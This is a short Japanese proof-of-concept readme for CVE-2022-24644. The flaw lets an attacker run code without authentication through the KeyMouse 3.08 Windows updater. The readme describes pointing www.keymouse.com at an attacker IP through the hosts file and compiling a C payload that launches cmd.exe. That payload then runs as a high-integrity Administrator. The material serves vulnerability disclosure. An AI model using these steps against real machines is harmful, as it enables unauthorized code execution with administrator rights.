
CVE-2022-24644の概念実証エクスプロイト。KeyMouse Windows 3.08アップデートメカニズムに対するDNSスプーフィングを介した認証なしのリモートコード実行を示しています。
ZZ Inc. KeyMouse 3.08 (Windows) 未認証更新リモートコード実行の脆弱性
使用方法: python3 cve-2022-24644_poc.py
詳細は gerr.re のレポートを参照してください。
www.keymouse.com を攻撃者のIPアドレスに偽装します。
c:\windows\system32\drivers\etc\hosts を編集するのが最も簡単です。
proof.c をコンパイルします(例:i686-w64-mingw32-gcc proof.c -o proof.exe)。#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
その結果、proof.exe が高整合性のAdministratorユーザーコンテキストで実行されます。